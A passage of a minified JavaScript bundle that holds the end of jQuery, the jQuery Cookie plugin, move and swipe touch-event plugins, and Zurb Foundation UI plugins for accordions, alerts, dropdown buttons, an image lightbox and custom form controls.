b4)){b4[b2]=b6[b2];b5[b2]=e}}}else{b5[b3]=e}}}aw.Animation=aw.extend(o,{tweener:function(b4,e){if(aw.isFunction(b4)){e=b4;b4=["*"]}else{b4=b4.split(" ")}var b3,b1=0,b2=b4.length;for(;b1<b2;b1++){b3=b4[b1];bR[b3]=bR[b3]||[];bR[b3].unshift(e)}},prefilter:function(e,b1){if(b1){p.unshift(e)}else{p.push(e)}}});function T(b2,cc,b9){var b6,cb,cg,b7,b1,ce,cf,b5,b8,e=this,cd=b2.style,ca={},b3=[],b4=b2.nodeType&&au(b2);if(!b9.queue){b5=aw._queueHooks(b2,"fx");if(b5.unqueued==null){b5.unqueued=0;b8=b5.empty.fire;b5.empty.fire=function(){if(!b5.unqueued){b8()}}}b5.unqueued++;e.always(function(){e.always(function(){b5.unqueued--;if(!aw.queue(b2,"fx").length){b5.empty.fire()}})})}if(b2.nodeType===1&&("height" in cc||"width" in cc)){b9.overflow=[cd.overflow,cd.overflowX,cd.overflowY];if(aw.css(b2,"display")==="inline"&&aw.css(b2,"float")==="none"){if(!aw.support.inlineBlockNeedsLayout||M(b2.nodeName)==="inline"){cd.display="inline-block"}else{cd.zoom=1}}}if(b9.overflow){cd.overflow="hidden";if(!aw.support.shrinkWrapBlocks){e.done(function(){cd.overflow=b9.overflow[0];cd.overflowX=b9.overflow[1];cd.overflowY=b9.overflow[2]})}}for(b6 in cc){cg=cc[b6];if(aZ.exec(cg)){delete cc[b6];ce=ce||cg==="toggle";if(cg===(b4?"hide":"show")){continue}b3.push(b6)}}b7=b3.length;if(b7){b1=aw._data(b2,"fxshow")||aw._data(b2,"fxshow",{});if("hidden" in b1){b4=b1.hidden}if(ce){b1.hidden=!b4}if(b4){aw(b2).show()}else{e.done(function(){aw(b2).hide()})}e.done(function(){var ch;aw._removeData(b2,"fxshow");for(ch in ca){aw.style(b2,ch,ca[ch])}});for(b6=0;b6<b7;b6++){cb=b3[b6];cf=e.createTween(cb,b4?b1[cb]:0);ca[cb]=b1[cb]||aw.style(b2,cb);if(!(cb in b1)){b1[cb]=cf.start;if(b4){cf.end=cf.start;cf.start=cb==="width"||cb==="height"?1:0}}}}}function bQ(b1,b3,b4,b2,e){return new bQ.prototype.init(b1,b3,b4,b2,e)}aw.Tween=bQ;bQ.prototype={constructor:bQ,init:function(b1,b3,b4,b2,e,b5){this.elem=b1;this.prop=b4;this.easing=e||"swing";this.options=b3;this.start=this.now=this.cur();this.end=b2;this.unit=b5||(aw.cssNumber[b4]?"":"px")},cur:function(){var e=bQ.propHooks[this.prop];return e&&e.get?e.get(this):bQ.propHooks._default.get(this)},run:function(b2){var e,b1=bQ.propHooks[this.prop];if(this.options.duration){this.pos=e=aw.easing[this.easing](b2,this.options.duration*b2,0,1,this.options.duration)}else{this.pos=e=b2}this.now=(this.end-this.start)*e+this.start;if(this.options.step){this.options.step.call(this.elem,this.now,this)}if(b1&&b1.set){b1.set(this)}else{bQ.propHooks._default.set(this)}return this}};bQ.prototype.init.prototype=bQ.prototype;bQ.propHooks={_default:{get:function(b1){var e;if(b1.elem[b1.prop]!=null&&(!b1.elem.style||b1.elem.style[b1.prop]==null)){return b1.elem[b1.prop]}e=aw.css(b1.elem,b1.prop,"auto");return !e||e==="auto"?0:e},set:function(e){if(aw.fx.step[e.prop]){aw.fx.step[e.prop](e)}else{if(e.elem.style&&(e.elem.style[aw.cssProps[e.prop]]!=null||aw.cssHooks[e.prop])){aw.style(e.elem,e.prop,e.now+e.unit)}else{e.elem[e.prop]=e.now}}}}};bQ.propHooks.scrollTop=bQ.propHooks.scrollLeft={set:function(e){if(e.elem.nodeType&&e.elem.parentNode){e.elem[e.prop]=e.now}}};aw.each(["toggle","show","hide"],function(b1,b2){var e=aw.fn[b2];aw.fn[b2]=function(b5,b4,b3){return b5==null||typeof b5==="boolean"?e.apply(this,arguments):this.animate(af(b2,true),b5,b4,b3)}});aw.fn.extend({fadeTo:function(b2,b3,b1,e){return this.filter(au).css("opacity",0).show().end().animate({opacity:b3},b2,b1,e)},animate:function(b5,b6,b2,e){var b3=aw.isEmptyObject(b5),b4=aw.speed(b6,b2,e),b1=function(){var b7=o(this,aw.extend({},b5),b4);b1.finish=function(){b7.stop(true)};if(b3||aw._data(this,"finish")){b7.stop(true)}};b1.finish=b1;return b3||b4.queue===false?this.each(b1):this.queue(b4.queue,b1)},stop:function(b3,e,b1){var b2=function(b4){var b5=b4.stop;delete b4.stop;b5(b1)};if(typeof b3!=="string"){b1=e;e=b3;b3=bS}if(e&&b3!==false){this.queue(b3||"fx",[])}return this.each(function(){var b5=true,b6=b3!=null&&b3+"queueHooks",b7=aw.timers,b4=aw._data(this);if(b6){if(b4[b6]&&b4[b6].stop){b2(b4[b6])}}else{for(b6 in b4){if(b4[b6]&&b4[b6].stop&&bq.test(b6)){b2(b4[b6])}}}for(b6=b7.length;b6--;){if(b7[b6].elem===this&&(b3==null||b7[b6].queue===b3)){b7[b6].anim.stop(b1);b5=false;b7.splice(b6,1)}}if(b5||!b1){aw.dequeue(this,b3)}})},finish:function(e){if(e!==false){e=e||"fx"}return this.each(function(){var b3,b1=aw._data(this),b5=b1[e+"queue"],b2=b1[e+"queueHooks"],b6=aw.timers,b4=b5?b5.length:0;b1.finish=true;aw.queue(this,e,[]);if(b2&&b2.cur&&b2.cur.finish){b2.cur.finish.call(this)}for(b3=b6.length;b3--;){if(b6[b3].elem===this&&b6[b3].queue===e){b6[b3].anim.stop(true);b6.splice(b3,1)}}for(b3=0;b3<b4;b3++){if(b5[b3]&&b5[b3].finish){b5[b3].finish.call(this)}}delete b1.finish})}});function af(b3,b2){var b4,e={height:b3},b1=0;b2=b2?1:0;for(;b1<4;b1+=2-b2){b4=N[b1];e["margin"+b4]=e["padding"+b4]=b3}if(b2){e.opacity=e.width=b3}return e}aw.each({slideDown:af("show"),slideUp:af("hide"),slideToggle:af("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,b1){aw.fn[e]=function(b4,b3,b2){return this.animate(b1,b4,b3,b2)}});aw.speed=function(b3,e,b1){var b2=b3&&typeof b3==="object"?aw.extend({},b3):{complete:b1||!b1&&e||aw.isFunction(b3)&&b3,duration:b3,easing:b1&&e||e&&!aw.isFunction(e)&&e};b2.duration=aw.fx.off?0:typeof b2.duration==="number"?b2.duration:b2.duration in aw.fx.speeds?aw.fx.speeds[b2.duration]:aw.fx.speeds._default;if(b2.queue==null||b2.queue===true){b2.queue="fx"}b2.old=b2.complete;b2.complete=function(){if(aw.isFunction(b2.old)){b2.old.call(this)}if(b2.queue){aw.dequeue(this,b2.queue)}};return b2};aw.easing={linear:function(e){return e},swing:function(e){return 0.5-Math.cos(e*Math.PI)/2}};aw.timers=[];aw.fx=bQ.prototype.init;aw.fx.tick=function(){var b1,b2=aw.timers,e=0;ae=aw.now();for(;e<b2.length;e++){b1=b2[e];if(!b1()&&b2[e]===b1){b2.splice(e--,1)}}if(!b2.length){aw.fx.stop()}ae=bS};aw.fx.timer=function(e){if(e()&&aw.timers.push(e)){aw.fx.start()}};aw.fx.interval=13;aw.fx.start=function(){if(!bO){bO=setInterval(aw.fx.tick,aw.fx.interval)}};aw.fx.stop=function(){clearInterval(bO);bO=null};aw.fx.speeds={slow:600,fast:200,_default:400};aw.fx.step={};if(aw.expr&&aw.expr.filters){aw.expr.filters.animated=function(e){return aw.grep(aw.timers,function(b1){return e===b1.elem}).length}}aw.fn.offset=function(b4){if(arguments.length){return b4===bS?this:this.each(function(b6){aw.offset.setOffset(this,b4,b6)})}var b2,b5,e={top:0,left:0},b3=this[0],b1=b3&&b3.ownerDocument;if(!b1){return}b2=b1.documentElement;if(!aw.contains(b2,b3)){return e}if(typeof b3.getBoundingClientRect!=="undefined"){e=b3.getBoundingClientRect()}b5=al(b1);return{top:e.top+(b5.pageYOffset||b2.scrollTop)-(b2.clientTop||0),left:e.left+(b5.pageXOffset||b2.scrollLeft)-(b2.clientLeft||0)}};aw.offset={setOffset:function(b8,ca,b9){var cb=aw.css(b8,"position");if(cb==="static"){b8.style.position="relative"}var b3=aw(b8),b5=b3.offset(),b2=aw.css(b8,"top"),b1=aw.css(b8,"left"),e=(cb==="absolute"||cb==="fixed")&&aw.inArray("auto",[b2,b1])>-1,cc={},b6={},b7,b4;if(e){b6=b3.position();b7=b6.top;b4=b6.left}else{b7=parseFloat(b2)||0;b4=parseFloat(b1)||0}if(aw.isFunction(ca)){ca=ca.call(b8,b9,b5)}if(ca.top!=null){cc.top=(ca.top-b5.top)+b7}if(ca.left!=null){cc.left=(ca.left-b5.left)+b4}if("using" in ca){ca.using.call(b8,cc)}else{b3.css(cc)}}};aw.fn.extend({position:function(){if(!this[0]){return}var b2,b1,b3={top:0,left:0},e=this[0];if(aw.css(e,"position")==="fixed"){b1=e.getBoundingClientRect()}else{b2=this.offsetParent();b1=this.offset();if(!aw.nodeName(b2[0],"html")){b3=b2.offset()}b3.top+=aw.css(b2[0],"borderTopWidth",true);b3.left+=aw.css(b2[0],"borderLeftWidth",true)}return{top:b1.top-b3.top-aw.css(e,"marginTop",true),left:b1.left-b3.left-aw.css(e,"marginLeft",true)}},offsetParent:function(){return this.map(function(){var e=this.offsetParent||V.documentElement;while(e&&(!aw.nodeName(e,"html")&&aw.css(e,"position")==="static")){e=e.offsetParent}return e||V.documentElement})}});aw.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,b1){var b2=/Y/.test(b1);aw.fn[e]=function(b3){return aw.access(this,function(b4,b5,b6){var b7=al(b4);if(b6===bS){return b7?(b1 in b7)?b7[b1]:b7.document.documentElement[b5]:b4[b5]}if(b7){b7.scrollTo(!b2?b6:aw(b7).scrollLeft(),b2?b6:aw(b7).scrollTop())}else{b4[b5]=b6}},e,b3,arguments.length,null)}});function al(e){return aw.isWindow(e)?e:e.nodeType===9?e.defaultView||e.parentWindow:false}aw.each({Height:"height",Width:"width"},function(e,b1){aw.each({padding:"inner"+e,content:b1,"":"outer"+e},function(b2,b3){aw.fn[b3]=function(b6,b7){var b4=arguments.length&&(b2||typeof b6!=="boolean"),b5=b2||(b6===true||b7===true?"margin":"border");return aw.access(this,function(b9,ca,cb){var b8;if(aw.isWindow(b9)){return b9.document.documentElement["client"+e]}if(b9.nodeType===9){b8=b9.documentElement;return Math.max(b9.body["scroll"+e],b8["scroll"+e],b9.body["offset"+e],b8["offset"+e],b8["client"+e])}return cb===bS?aw.css(b9,ca,b5):aw.style(b9,ca,cb,b5)},b1,b4?b6:bS,b4,null)}})});bU.jQuery=bU.$=aw;if(typeof define==="function"&&define.amd&&define.amd.jQuery){define("jquery",[],function(){return aw})}})(window); /* * jQuery Cookie Plugin v1.3 * https://github.com/carhartl/jquery-cookie * * Copyright 2011, Klaus Hartl * Dual licensed under the MIT or GPL Version 2 licenses. * http://www.opensource.org/licenses/mit-license.php * http://www.opensource.org/licenses/GPL-2.0 */ (function(a,d,g){var e=/\+/g;function f(h){return h}function c(h){return decodeURIComponent(h.replace(e," "))}var b=a.cookie=function(o,u,q){if(u!==g){q=a.extend({},b.defaults,q);if(u===null){q.expires=-1}if(typeof q.expires==="number"){var k=q.expires,s=q.expires=new Date();s.setDate(s.getDate()+k)}u=b.json?JSON.stringify(u):String(u);return(d.cookie=[encodeURIComponent(o),"=",b.raw?u:encodeURIComponent(u),q.expires?"; expires="+q.expires.toUTCString():"",q.path?"; path="+q.path:"",q.domain?"; domain="+q.domain:"",q.secure?"; secure":""].join(""))}var m=b.raw?f:c;var j=d.cookie.split("; ");for(var n=0,p=j.length;n<p;n++){var r=j[n].split("=");if(m(r.shift())===o){var h=m(r.join("="));return b.json?JSON.parse(h):h}}return null};b.defaults={};a.removeCookie=function(h,i){if(a.cookie(h)!==null){a.cookie(h,null,i);return true}return false}})(jQuery,document); (function(a){if(typeof define==="function"&&define.amd){define(["jquery"],a)}else{a(jQuery)}})(function(o,O){var G=6,e=o.event.add,v=o.event.remove,M=function(R,S,Q){o.event.trigger(S,Q,R)},B=(function(){return(window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||function(R,Q){return window.setTimeout(function(){R()},25)})})(),m={textarea:true,input:true,select:true,button:true},r={move:"mousemove",cancel:"mouseup dragstart",end:"mouseup"},J={move:"touchmove",cancel:"touchend",end:"touchend"};function H(S){var R=S,Q=false,T=false;function U(V){if(Q){R();B(U);T=true;Q=false}else{T=false}}this.kick=function(V){Q=true;if(!T){U()}};this.end=function(W){var V=R;if(!W){return}if(!T){W()}else{R=Q?function(){V();W()}:W;Q=true}}}function D(){return true}function C(){return false}function t(Q){Q.preventDefault()}function u(Q){if(m[Q.target.tagName.toLowerCase()]){return}Q.preventDefault()}function n(Q){return(Q.which===1&&!Q.ctrlKey&&!Q.altKey)}function l(T,R){var Q,S;if(T.identifiedTouch){return T.identifiedTouch(R)}Q=-1;S=T.length;while(++Q<S){if(T[Q].identifier===R){return T[Q]}}}function g(Q,R){var S=l(Q.changedTouches,R.identifier);if(!S){return}if(S.pageX===R.pageX&&S.pageY===R.pageY){return}return S}function p(R){var Q;if(!n(R)){return}Q={target:R.target,startX:R.pageX,startY:R.pageY,timeStamp:R.timeStamp};e(document,r.move,s,Q);e(document,r.cancel,q,Q)}function s(R){var Q=R.data;h(R,Q,R,z)}function q(Q){z()}function z(){v(document,r.move,s);v(document,r.cancel,z)}function L(Q){var S,R;if(m[Q.target.tagName.toLowerCase()]){return}S=Q.changedTouches[0];R={target:S.target,startX:S.pageX,startY:S.pageY,timeStamp:Q.timeStamp,identifier:S.identifier};e(document,J.move+"."+S.identifier,K,R);e(document,J.cancel+"."+S.identifier,I,R)}function K(R){var Q=R.data,S=g(R,Q);if(!S){return}h(R,Q,S,A)}function I(Q){var R=Q.data,S=l(Q.changedTouches,R.identifier);if(!S){return}A(R.identifier)}function A(Q){v(document,"."+Q,K);v(document,"."+Q,I)}function h(S,U,V,T){var Q=V.pageX-U.startX,R=V.pageY-U.startY;if((Q*Q)+(R*R)<(G*G)){return}N(S,U,V,Q,R,T)}function k(){this._handled=D;return false}function j(Q){Q._handled()}function N(S,V,X,Q,R,T){var U=V.target,Y,W;Y=S.targetTouches;W=S.timeStamp-V.timeStamp;V.type="movestart";V.distX=Q;V.distY=R;V.deltaX=Q;V.deltaY=R;V.pageX=X.pageX;V.pageY=X.pageY;V.velocityX=Q/W;V.velocityY=R/W;V.targetTouches=Y;V.finger=Y?Y.length:1;V._handled=k;V._preventTouchmoveDefault=function(){S.preventDefault()};M(V.target,V);T(V.identifier)}function b(Q){var R=Q.data.event,S=Q.data.timer;P(R,Q,Q.timeStamp,S)}function a(Q){var R=Q.data.event,S=Q.data.timer;w();i(R,S,function(){setTimeout(function(){v(R.target,"click",C)},0)})}function w(Q){v(document,r.move,b);v(document,r.end,a)}function d(Q){var R=Q.data.event,S=Q.data.timer,T=g(Q,R);if(!T){return}Q.preventDefault();R.targetTouches=Q.targetTouches;P(R,T,Q.timeStamp,S)}function c(Q){var R=Q.data.event,S=Q.data.timer,T=l(Q.changedTouches,R.identifier);if(!T){return}x(R);i(R,S)}function x(Q){v(document,"."+Q.identifier,d);v(document,"."+Q.identifier,c)}function P(Q,U,T,S){var R=T-Q.timeStamp;Q.type="move";Q.distX=U.pageX-Q.startX;Q.distY=U.pageY-Q.startY;Q.deltaX=U.pageX-Q.pageX;Q.deltaY=U.pageY-Q.pageY;Q.velocityX=0.3*Q.velocityX+0.7*Q.deltaX/R;Q.velocityY=0.3*Q.velocityY+0.7*Q.deltaY/R;Q.pageX=U.pageX;Q.pageY=U.pageY;S.kick()}function i(Q,S,R){S.end(function(){Q.type="moveend";M(Q.target,Q);return R&&R()})}function E(Q,S,R){e(this,"movestart.move",j);return true}function F(Q){v(this,"dragstart drag",t);v(this,"mousedown touchstart",u);v(this,"movestart",j);return true}function f(Q){if(Q.namespace==="move"||Q.namespace==="moveend"){return}e(this,"dragstart."+Q.guid+" drag."+Q.guid,t,O,Q.selector);e(this,"mousedown."+Q.guid,u,O,Q.selector)}function y(Q){if(Q.namespace==="move"||Q.namespace==="moveend"){return}v(this,"dragstart."+Q.guid+" drag."+Q.guid);v(this,"mousedown."+Q.guid)}o.event.special.movestart={setup:E,teardown:F,add:f,remove:y,_default:function(R){var S,Q;if(!R._handled()){return}S={target:R.target,startX:R.startX,startY:R.startY,pageX:R.pageX,pageY:R.pageY,distX:R.distX,distY:R.distY,deltaX:R.deltaX,deltaY:R.deltaY,velocityX:R.velocityX,velocityY:R.velocityY,timeStamp:R.timeStamp,identifier:R.identifier,targetTouches:R.targetTouches,finger:R.finger};Q={event:S,timer:new H(function(T){M(R.target,S)})};if(R.identifier===O){e(R.target,"click",C);e(document,r.move,b,Q);e(document,r.end,a,Q)}else{R._preventTouchmoveDefault();e(document,J.move+"."+R.identifier,d,Q);e(document,J.end+"."+R.identifier,c,Q)}}};o.event.special.move={setup:function(){e(this,"movestart.move",o.noop)},teardown:function(){v(this,"movestart.move",o.noop)}};o.event.special.moveend={setup:function(){e(this,"movestart.moveend",o.noop)},teardown:function(){v(this,"movestart.moveend",o.noop)}};e(document,"mousedown.move",p);e(document,"touchstart.move",L);if(typeof Array.prototype.indexOf==="function"){(function(Q,T){var S=["changedTouches","targetTouches"],R=S.length;while(R--){if(Q.event.props.indexOf(S[R])===-1){Q.event.props.push(S[R])}}})(o)}}); (function(a){if(typeof define==="function"&&define.amd){define(["jquery"],a)}else{a(jQuery)}})(function(c,h){var a=c.event.add,e=c.event.remove,g=function(j,k,i){c.event.trigger(k,i,j)},f={threshold:0.4,sensitivity:6};function d(i){var l,k,j;l=i.target.offsetWidth;k=i.target.offsetHeight;j={distX:i.distX,distY:i.distY,velocityX:i.velocityX,velocityY:i.velocityY,finger:i.finger};if(i.distX>i.distY){if(i.distX>-i.distY){if(i.distX/l>f.threshold||i.velocityX*i.distX/l*f.sensitivity>1){j.type="swiperight";g(i.currentTarget,j)}}else{if(-i.distY/k>f.threshold||i.velocityY*i.distY/l*f.sensitivity>1){j.type="swipeup";g(i.currentTarget,j)}}}else{if(i.distX>-i.distY){if(i.distY/k>f.threshold||i.velocityY*i.distY/l*f.sensitivity>1){j.type="swipedown";g(i.currentTarget,j)}}else{if(-i.distX/l>f.threshold||i.velocityX*i.distX/l*f.sensitivity>1){j.type="swipeleft";g(i.currentTarget,j)}}}}function b(j){var i=c.data(j,"event_swipe");if(!i){i={count:0};c.data(j,"event_swipe",i)}return i}c.event.special.swipe=c.event.special.swipeleft=c.event.special.swiperight=c.event.special.swipeup=c.event.special.swipedown={setup:function(i,k,j){var i=b(this);if(i.count++>0){return}a(this,"moveend",d);return true},teardown:function(){var i=b(this);if(--i.count>0){return}e(this,"moveend",d);return true},settings:f}}); (function(a,c,b){a.fn.foundationAccordion=function(e){var d=function(f){return f.hasClass("hover")&&!Modernizr.touch};a(document).on("mouseenter",".accordion li",function(){var g=a(this).parent();if(d(g)){var f=a(this).children(".content").first();a(".content",g).not(f).hide().parent("li").removeClass("active");f.show(0,function(){f.parent("li").addClass("active")})}});a(document).on("click.fndtn",".accordion li .title",function(){var g=a(this).closest("li"),h=g.parent();if(!d(h)){var f=g.children(".content").first();if(g.hasClass("active")){h.find("li").removeClass("active").end().find(".content").hide()}else{a(".content",h).not(f).hide().parent("li").removeClass("active");f.show(0,function(){f.parent("li").addClass("active")})}}})}})(jQuery,this); (function(a,c,b){a.fn.foundationAlerts=function(d){var e=a.extend({callback:a.noop},d);a(document).on("click",".alert-box a.close",function(f){f.preventDefault();a(this).closest(".alert-box").fadeOut(function(){a(this).remove();e.callback()})})}})(jQuery,this); (function(a,c,b){a.fn.foundationButtons=function(i){var d=a(document),f=a.extend({dropdownAsToggle:false,activeClass:"active"},i),e=function(m){a(".button.dropdown").find("ul").not(m).removeClass("show-dropdown")},j=function(m){var n=a(".button.dropdown").not(m);n.add(a("> span."+f.activeClass,n)).removeClass(f.activeClass)};d.on("click.fndtn",".button.disabled",function(m){m.preventDefault()});a(".button.dropdown > ul",this).addClass("no-hover");d.on("click.fndtn",".button.dropdown:not(.split), .button.dropdown.split span",function(p){var m=a(this),n=m.closest(".button.dropdown"),o=a("> ul",n);if(a.inArray(p.target.nodeName,["A","BUTTON"])){p.preventDefault()}setTimeout(function(){e(f.dropdownAsToggle?"":o);o.toggleClass("show-dropdown");if(f.dropdownAsToggle){j(n);m.toggleClass(f.activeClass)}},0)});d.on("click.fndtn","body, html",function(m){if(b==m.originalEvent){return}if(!a(m.originalEvent.target).is(".button.dropdown:not(.split), .button.dropdown.split span")){e();if(f.dropdownAsToggle){j()}}});var h=a(".button.dropdown:not(.large):not(.small):not(.tiny):visible",this).outerHeight()-1,g=a(".button.large.dropdown:visible",this).outerHeight()-1,k=a(".button.small.dropdown:visible",this).outerHeight()-1,l=a(".button.tiny.dropdown:visible",this).outerHeight()-1;a(".button.dropdown:not(.large):not(.small):not(.tiny) > ul",this).css("top",h);a(".button.dropdown.large > ul",this).css("top",g);a(".button.dropdown.small > ul",this).css("top",k);a(".button.dropdown.tiny > ul",this).css("top",l);a(".button.dropdown.up:not(.large):not(.small):not(.tiny) > ul",this).css("top","auto").css("bottom",h-2);a(".button.dropdown.up.large > ul",this).css("top","auto").css("bottom",g-2);a(".button.dropdown.up.small > ul",this).css("top","auto").css("bottom",k-2);a(".button.dropdown.up.tiny > ul",this).css("top","auto").css("bottom",l-2)}})(jQuery,this); (function(a,f,d,e){var c={templates:{viewing:'<a href="#" class="clearing-close">&times;</a><div class="visible-img" style="display: none"><img src="#"><p class="clearing-caption"></p><a href="#" class="clearing-main-left"></a><a href="#" class="clearing-main-right"></a></div>'},close_selectors:"a.clearing-close",initialized:false,locked:false},b={init:function(h,g){return this.find("ul[data-clearing]").each(function(){var j=a(d),i=a(this),l=l||{},k=k||{},m=i.data("fndtn.clearing.settings");if(!m){l.$parent=i.parent();i.data("fndtn.clearing.settings",a.extend({},c,l));b.assemble(i.find("li"));if(!c.initialized){b.events(i);if(Modernizr.touch){b.swipe_events()}}}})},events:function(g){var h=g.data("fndtn.clearing.settings");a(d).on("click.fndtn.clearing","ul[data-clearing] li",function(j,i,l){var i=i||a(this),l=l||i,k=i.parent().data("fndtn.clearing.settings");j.preventDefault();if(!k){i.parent().foundationClearing()}b.open(a(j.target),i,l);b.update_paddles(l)}).on("click.fndtn.clearing",".clearing-main-right",function(i){b.nav(i,"next")}).on("click.fndtn.clearing",".clearing-main-left",function(i){b.nav(i,"prev")}).on("click.fndtn.clearing",h.close_selectors,this.close).on("keydown.fndtn.clearing",this.keydown);a(f).on("resize.fndtn.clearing",this.resize);c.initialized=true},swipe_events:function(){a(d).bind("swipeleft","ul[data-clearing]",function(g){b.nav(g,"next")}).bind("swiperight","ul[data-clearing]",function(g){b.nav(g,"prev")}).bind("movestart","ul[data-clearing]",function(g){if((g.distX>g.distY&&g.distX<-g.distY)||(g.distX<g.distY&&g.distX>-g.distY)){g.preventDefault()}})},assemble:function(h){var g=h.parent(),k=g.data("fndtn.clearing.settings"),j=g.detach(),i={grid:'<div class="carousel">'+this.outerHTML(j[0])+"</div>",viewing:k.templates.viewing},l='<div class="clearing-assembled"><div>'+i.viewing+i.grid+"</div></div>";return k.$parent.append(l)},open:function(g,i,l){var k=l.closest(".clearing-assembled"),h=k.find("div:first"),m=h.find(".visible-img"),j=m.find("img").not(g);if(!b.locked()){j.attr("src",this.load(g));j.loaded(function(){k.addClass("clearing-blackout");h.addClass("clearing-container");this.caption(m.find(".clearing-caption"),g);m.show();this.fix_height(l);this.center(j);this.shift(i,l,function(){l.siblings().removeClass("visible");l.addClass("visible")})}.bind(this))}},close:function(h){h.preventDefault();var i=(function(k){if(/blackout/.test(k.selector)){return k}else{return k.closest(".clearing-blackout")}}(a(this))),g,j;if(this===h.target&&i){g=i.find("div:first"),j=g.find(".visible-img");c.prev_index=0;i.find("ul[data-clearing]").attr("style","");i.removeClass("clearing-blackout");g.removeClass("clearing-container");j.hide()}return false},keydown:function(h){var g=a(".clearing-blackout").find("ul[data-clearing]");if(h.which===39){b.go(g,"next")}if(h.which===37){b.go(g,"prev")}if(h.which===27){a("a.clearing-close").trigger("click")}},nav:function(i,h){var g=a(".clearing-blackout").find("ul[data-clearing]");i.preventDefault();this.go(g,h)},resize:function(){var g=a(".clearing-blackout .visible-img").find("img");if(g.length>0){b.center(g)}},fix_height:function(h){var g=h.siblings();g.each(function(){var j=a(this),i=j.find("img");if(j.height()>i.outerHeight()){j.addClass("fix-height")}}).closest("ul").width(g.length*100+"%")},update_paddles:function(g){var h=g.closest(".carousel").siblings(".visible-img");if(g.next().length>0){h.find(".clearing-main-right").removeClass("disabled")}else{h.find(".clearing-main-right").addClass("disabled")}if(g.prev().length>0){h.find(".clearing-main-left").removeClass("disabled")}else{h.find(".clearing-main-left").addClass("disabled")}},load:function(g){var h=g.parent().attr("href");this.preload(g);if(h){return h}return g.attr("src")},preload:function(g){this.img(g.closest("li").next());this.img(g.closest("li").prev())},img:function(g){if(g.length>0){var i=new Image(),h=g.find("a");if(h.length>0){i.src=h.attr("href")}else{i.src=g.find("img").attr("src")}}},caption:function(i,g){var h=g.data("caption");if(h){i.text(h).show()}else{i.text("").hide()}},go:function(g,i){var h=g.find(".visible"),j=h[i]();if(j.length>0){j.find("img").trigger("click",[h,j])}},shift:function(i,n,g){var h=n.parent(),l=c.prev_index,j=this.direction(h,i,n),k=parseInt(h.css("left"),10),o=n.outerWidth(),m;if(n.index()!==l&&!/skip/.test(j)){if(/left/.test(j)){this.lock();h.animate({left:k+o},300,this.unlock)}else{if(/right/.test(j)){this.lock();h.animate({left:k-o},300,this.unlock)}}}else{if(/skip/.test(j)){m=n.index()-c.up_count;this.lock();if(m>0){h.animate({left:-(m*o)},300,this.unlock)}else{h.animate({left:0},300,this.unlock)}}}g()},lock:function(){c.locked=true},unlock:function(){c.locked=false},locked:function(){return c.locked},direction:function(g,h,l){var j=g.find("li"),i=j.outerWidth()+(j.outerWidth()/4),n=Math.floor(a(".clearing-container").outerWidth()/i)-1,m=j.index(l),k;c.up_count=n;if(this.adjacent(c.prev_index,m)){if((m>n)&&m>c.prev_index){k="right"}else{if((m>n-1)&&m<=c.prev_index){k="left"}else{k=false}}}else{k="skip"}c.prev_index=m;return k},adjacent:function(g,j){for(var h=j+1;h>=j-1;h--){if(h===g){return true}}return false},center:function(g){g.css({marginLeft:-(g.outerWidth()/2),marginTop:-(g.outerHeight()/2)})},outerHTML:function(g){return g.outerHTML||new XMLSerializer().serializeToString(g)}};a.fn.foundationClearing=function(g){if(b[g]){return b[g].apply(this,Array.prototype.slice.call(arguments,1))}else{if(typeof g==="object"||!g){return b.init.apply(this,arguments)}else{a.error("Method "+g+" does not exist on jQuery.foundationClearing")}}};(function(g){g.fn.loaded=function(j,n){var l=g.extend({},g.fn.loaded.defaults,n),h=this.find("img").add(this.filter("img")),m=h.length;function k(){m-=1;!m&&j()}function i(){this.one("load",k);if(g.browser.msie){var p=this.attr("src"),o=p.match(/\?/)?"&":"?";o+=l.cachePrefix+"="+(new Date()).getTime();this.attr("src",p+o)}}return h.each(function(){var o=g(this);if(!o.attr("src")){k();return}this.complete||this.readyState===4?k():i.call(o)})};g.fn.loaded.defaults={cachePrefix:"random"}}(jQuery))}(jQuery,this,this.document)); (function(a){var b=function(){return{tmp:[],hidden:null,adjust:function(f){var g=this;g.hidden=f.parents().andSelf().filter(":hidden");g.hidden.each(function(){var h=a(this);g.tmp.push(h.attr("style"));h.css({visibility:"hidden",display:"block"})})},reset:function(){var f=this;f.hidden.each(function(j){var g=a(this),h=f.tmp[j];if(h===undefined){g.removeAttr("style")}else{g.attr("style",h)}});f.tmp=[];f.hidden=null}}};jQuery.foundation=jQuery.foundation||{};jQuery.foundation.customForms=jQuery.foundation.customForms||{};a.foundation.customForms.appendCustomMarkup=function(i){var h={disable_class:"no-custom"};i=a.extend(h,i);function f(l,m){var k=a(m).hide(),n=k.attr("type"),j=k.next("span.custom."+n);if(j.length===0){j=a('<span class="custom '+n+'"></span>').insertAfter(k)}j.toggleClass("checked",k.is(":checked"));j.toggleClass("disabled",k.is(":disabled"))}function g(u,x){var t=b();var r=a(x),l=r.next("div.custom.dropdown"),k=l.find("ul"),o=l.find(".current"),q=l.find(".selector"),n=r.find("option"),p=n.filter(":selected"),w=0,v="",m;var j=false;if(r.hasClass(i.disable_class)){return}if(l.length===0){var s=r.hasClass("small")?"small":r.hasClass("medium")?"medium":r.hasClass("large")?"large":r.hasClass("expand")?"expand":"";l=a('<div class="'+["custom","dropdown",s].join(" ")+'"><a href="#" class="selector"></a><ul /></div>');q=l.find(".selector");k=l.find("ul");v=n.map(function(){return"<li>"+a(this).html()+"</li>"}).get().join("");k.append(v);j=l.prepend('<a href="#" class="current">'+p.html()+"</a>").find(".current");r.after(l).hide()}else{v=n.map(function(){return"<li>"+a(this).html()+"</li>"}).get().join("");k.html("").append(v)}l.toggleClass("disabled",r.is(":disabled"));m=k.find("li");n.each(function(y){if(this.selected){m.eq(y).addClass("selected");if(j){j.html(a(this).html())}}});k.css("width","auto");l.css("width","auto");if(!l.is(".small, .medium, .large, .expand")){l.addClass("open");t.adjust(k);w=(m.outerWidth()>w)?m.outerWidth():w;t.reset();l.removeClass("open");l.width(w+28);k.width(w+28)}}a("form.custom input:radio[data-customforms!=disabled]").each(f);a("form.custom input:checkbox[data-customforms!=disabled]").each(f);a("form.custom select[data-customforms!=disabled]").each(g)};var c=function(g){var 